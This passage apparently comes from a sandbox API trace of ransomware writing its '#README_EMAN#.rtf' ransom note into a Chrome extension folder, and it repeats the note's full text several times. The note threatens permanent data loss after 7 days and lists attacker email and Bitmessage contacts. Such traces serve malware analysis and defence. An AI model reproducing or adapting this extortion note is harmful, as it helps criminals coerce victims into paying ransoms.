w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.557] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.557] CloseHandle (hObject=0x2c8) returned 1 [0278.557] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0278.557] GetLastError () returned 0x2 [0278.557] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.558] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.558] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 